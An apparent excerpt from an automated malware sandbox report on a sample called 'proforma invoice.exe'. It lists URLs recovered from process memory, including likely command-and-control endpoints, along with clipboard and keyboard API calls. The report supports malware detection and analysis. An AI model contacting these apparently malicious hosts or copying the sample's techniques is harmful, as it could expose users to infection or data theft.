6e 2c
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/js/min.js?v2.3
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28903/search.png)
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.Bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Buy_Mutual_Funds.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2Bt
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Financial_Services.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Resume_Search.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2F%2BtVzp
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/Venture_Capital_Firms.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/design/underconstructionnotice.php?d=bfiworkerscomp.com
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.bfiworkerscomp.com/__media__/js/trademark.php?d=bfiworkerscomp.com&type=ns
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4105630870.0000000005095000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dmtxwuatbz.cc/lfkn/
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.domaintechnik.at/data/gfx/dt_logo_parking.png
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: clip.exe, 00000003.00000002.4104507554.0000000006766000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003DE6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000003.00000002.4104507554.0000000005F8C000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.000000000360C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000003.00000002.4103317306.000000000321F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2033778728.000000000805C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png
            Source: clip.exe, 00000003.00000002.4104507554.00000000068F8000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.domaintechnik.at/fileadmin/gfx/icons/partner.jpg
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000003.2038844219.000000000807E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.4104507554.0000000005944000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000002FC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B744000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&AZOTcfex=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4104507554.0000000005944000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000002FC4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B744000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?bB7L5=DPt0-rQpMXpt&amp;AZOTcfex=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.4105952393.0000000007D90000.00000004.00000800.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104507554.0000000006442000.00000004.10000000.00040000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4104047705.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1EAFF
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B1ED6A
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B1EAFF
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_00B0AA57
